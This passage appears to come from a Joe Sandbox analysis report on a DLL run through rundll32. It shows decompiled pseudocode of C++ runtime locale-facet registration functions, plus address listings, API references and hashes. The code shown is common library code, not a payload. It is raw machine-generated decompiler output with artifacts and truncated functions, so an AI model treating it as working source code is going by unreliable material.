																															E6E223D74(_t462 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t327, _t438, _t449, 0x14);
																															E6E206653(_t462 - 0x14, 0);
																															_t450 =  *0x6e2c6dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6E1E161C(0x6e2c6d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6E2066BA(_t462 - 0x14);
																																return E6E220075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6E21162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6E1E1438(_t397);
																																		E6E223D74(_t462 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e26851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6e26c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6E21542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6E220075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6E206FD3(__eflags, _t439);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6e2c6dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6E206FD3(__eflags, _t438);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6e2c6e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6E206FD3(__eflags, _t437);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6e2c6dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6E206FD3(__eflags, _t436);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6e2c6dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6E206FD3(__eflags, _t435);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6e2c6de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6E206FD3(__eflags, _t434);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6e2c6ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6E206FD3(__eflags, _t433);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6e2c6db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6E206FD3(__eflags, _t432);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6e2c6dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6E206FD3(__eflags, _t431);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6e2c6dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6E206FD3(__eflags, _t430);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6e2c6dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}




































                          0x6e20f6b3
                          0x6e20f6b3
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e4
                          0x6e20f6e9
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F6BA
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F6C4
                          • int.LIBCPMT ref: 6E20F6DB
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F6FE
                          • std::_Facet_Register.LIBCPMT ref: 6E20F715
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F735
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F753
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID: |m,n
                          • API String ID: 113178234-3550068666
                          • Opcode ID: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
                          • Instruction ID: fd568e27bc1ff9b3a391e1cd033205c842be542f981569738765c01386a0c0e3
                          • Opcode Fuzzy Hash: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
                          • Instruction Fuzzy Hash: F311CA7595051D9FCF01DBD4C894AEEB77BBF44714F240908E4106B2D0DB749A85C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t418 - 0x14, 0);
				_t399 =  *0x6e2c6dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6E1E161C(0x6e2c6d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6E2066BA(_t418 - 0x14);
					return E6E220075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6E2112B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t418 - 0x20);
							E6E223D74(_t418 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t389, _t399, 0x14);
							E6E206653(_t418 - 0x14, 0);
							_t400 =  *0x6e2c6dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6E1E161C(0x6e2c6d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6E2066BA(_t418 - 0x14);
								return E6E220075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6E211339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t418 - 0x20);
										E6E223D74(_t418 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t296, _t390, _t400, 0x14);
										E6E206653(_t418 - 0x14, 0);
										_t401 =  *0x6e2c6db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6E1E161C(0x6e2c6d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6E2066BA(_t418 - 0x14);
											return E6E220075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6E2113A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t418 - 0x20);
													E6E223D74(_t418 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t296, _t391, _t401, 0x14);
													E6E206653(_t418 - 0x14, 0);
													_t402 =  *0x6e2c6ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6E1E161C(0x6e2c6d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6E2066BA(_t418 - 0x14);
														return E6E220075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6E211409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t418 - 0x20);
																E6E223D74(_t418 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t296, _t392, _t402, 0x14);
																E6E206653(_t418 - 0x14, 0);
																_t403 =  *0x6e2c6de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6E1E161C(0x6e2c6d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6E2066BA(_t418 - 0x14);
																	return E6E220075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6E211471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t418 - 0x20);
																			E6E223D74(_t418 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t296, _t393, _t403, 0x14);
																			E6E206653(_t418 - 0x14, 0);
																			_t404 =  *0x6e2c6dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6E1E161C(0x6e2c6da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6E2066BA(_t418 - 0x14);
																				return E6E220075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6E2114EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t418 - 0x20);
																						E6E223D74(_t418 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t296, _t394, _t404, 0x14);
																						E6E206653(_t418 - 0x14, 0);
																						_t405 =  *0x6e2c6dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6E1E161C(0x6e2c6d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6E2066BA(_t418 - 0x14);
																							return E6E220075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6E211558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t418 - 0x20);
																									E6E223D74(_t418 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t296, _t395, _t405, 0x14);
																									E6E206653(_t418 - 0x14, 0);
																									_t406 =  *0x6e2c6e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6E1E161C(0x6e2c6dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6E2066BA(_t418 - 0x14);
																										return E6E220075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6E2115C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t418 - 0x20);
																												E6E223D74(_t418 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t296, _t396, _t406, 0x14);
																												E6E206653(_t418 - 0x14, 0);
																												_t407 =  *0x6e2c6dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6E1E161C(0x6e2c6d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6E2066BA(_t418 - 0x14);
																													return E6E220075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6E21162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6E1E1438(_t359);
																															E6E223D74(_t418 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e26851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6e26c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6E21542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6E220075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6E206FD3(__eflags, _t397);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6e2c6dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6E206FD3(__eflags, _t396);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6e2c6e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6E206FD3(__eflags, _t395);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6e2c6dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6E206FD3(__eflags, _t394);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6e2c6dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6E206FD3(__eflags, _t393);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6e2c6de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6E206FD3(__eflags, _t392);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6e2c6ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6E206FD3(__eflags, _t391);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6e2c6db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6E206FD3(__eflags, _t390);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6e2c6dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
